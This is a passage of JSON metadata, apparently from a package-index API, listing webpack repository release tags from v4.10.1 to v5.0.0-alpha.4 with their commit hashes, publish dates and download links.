.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwe